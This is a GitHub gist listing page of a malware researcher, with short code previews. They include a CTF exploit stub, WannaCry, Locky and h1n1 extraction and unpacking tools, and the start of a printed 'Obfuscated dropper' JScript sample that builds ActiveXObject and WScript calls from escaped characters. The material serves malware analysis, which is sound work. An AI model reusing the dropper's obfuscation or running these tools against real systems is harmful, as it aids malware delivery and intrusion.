Skip to content

Instantly share code, notes, and snippets.

View mak's full-sized avatar

Maciej Kotowicz mak

164 followers · 3 following
View GitHub Profile
@mak
mak / keybase.md
Created April 15, 2015 23:28

Keybase proof

I hereby claim:

  • I am mak on github.
  • I am comak (https://keybase.io/comak) on keybase.
  • I have a public key whose fingerprint is F9C7 AC9F 9C8E 018B 732C 4B8E 9B9F 2F80 A0CA 69F5

To claim this, I am signing this object:

@mak
mak / gist:362840
Created April 11, 2010 16:00
Inductive vector (A:Set) : nat -> Type :=
| vnil : vector A 0
| vcons : forall n, A -> vector A n -> vector A (S n).
Implicit Arguments vector [A].
Implicit Arguments vcons [A n].
Implicit Arguments vnil [A].
Fixpoint vecfold (A:Set) B n (f : A -> B -> B) (c:B) (l:vector n) :=
match l with
@mak
mak / dupa.rb
Created June 7, 2012 21:45
Test linux railgun
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
@mak
mak / exp300.py
Created January 3, 2018 17:29
Exploit for 300 at 34c3ctf
import phun
class R(phun.Remote):
def menu(self):
self.read('4) free\n')
def cmd(self,nr,idx):
self.menu()
self.sendline(str(nr))
@mak
mak / wcr.py
Last active October 28, 2018 21:09
Extract everything from WannaCry
import re
import os,sys
import pefile
import struct
import zipfile
import hashlib
import StringIO
from Crypto import Random
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5,AES
@mak
mak / hdoc.py
Last active October 28, 2018 21:09
Extract payload from H-docs
#!/usr/bin/env python2
import os
import re
import sys
import math
import pefile
import struct
import hashlib
import argparse
from oletools import olevba
@mak
mak / x.sh
Created March 7, 2017 12:19
one-liner to extract powershell command in recent nymaim's documnets
( olevba $document | grep ' = ' | \
sed -e's/&/+/g' -e's/NaN/None/g' -e's/ = [^A].*(\(A.*)\))/= \1/' -e 's/Array//' \
-e's/(/[/g' -e's/)/]/g' -e "s#\"\([^\"]*\)\"\([^\"]*\)\"#\"\1'\2#" | \
grep '\[\|\+'; \
echo 'print globals()[sorted(globals(),key=lambda x: type(globals()[x]) == str and len(globals()[x]))[-1]]'
) \
| python2 - | tr -d '^' | tr '[:upper:]' '[:lower:]'
@mak
mak / get_locky.py
Created June 22, 2016 22:16
locky sample downloader
import sys
import hashlib
import struct
import requests
def decode(data,seed,step):
r = []
k = seed
for c in map(ord,data):
r.append(chr(c ^ k))
@mak
mak / h1n1_emu.py
Created May 27, 2016 16:42
Unpack last stage of h1n1 loader
import sys
import pefile
from unicorn import *
from unicorn.x86_const import *
pe = pefile.PE(sys.argv[1])
for s in pe.sections:
if s.Name.strip("\x00") == '.rsrc':
code_section = s
@mak
mak / Document.js
Last active October 28, 2018 21:12
Obfuscated dropper
obj_even='fuck';obj_term='aiyyoI';obj_term='thingIm';obj_initiatives6='just';obj_terabytes3='little';obj_since='bitAiyyo7'
;obj_analytics='dispensing';obj_some0='thingIm';obj_target2='motherfucking8';obj_gigabytes='smile';obj_store4='freaks
;obj_percapita='feeding';obj_size10='this';obj_hundreds10='just5';obj_complex='itself2';obj_their1='feeding';obj_sets
='dont4';obj_simulations3='relieveAll';obj_seldom='freaks';var obj_from=this[{the2:'\u0041'}.the2+{h0:'\u0063'}.h0+{o0
:'\u0074'}.o0+{if1:'\u0069'}.if1+{a2:'\u0076'}.a2+{efe0:'\u0065'}.efe0+{ou2:'\u0058'}.ou2+{at3:'\u004f'}.at3+{l1:'\u0062'}
.l1+{ccu1:'\u006a'}.ccu1+{a0:'\u0065'}.a0+{ec0:'\u0063'}.ec0+{an1:'\u0074'}.an1];var obj_thousands7=this[{eri0:'\u0057'}
.eri0+{onn0:'\u0053'}.onn0+{ue0:'\u0063'}.ue0+{un2:'\u0072'}.un2+{iff1:'\u0069'}.iff1+{red3:'\u0070'}.red3+{n3:'\u0074'}
.n3];var obj_data6 = obj_thousands7[{e3:'\u0043'}.e3+{art0:'\u0072'}.art0+{ec1:'\u0065'}.ec1+{l3:'\u0061'}.l3+{ea2
:'\u0074'}.ea2+{o1:'\u0065'}.o1+{ci2:'\u004f'}.ci2+{e2:'\u0062'}.e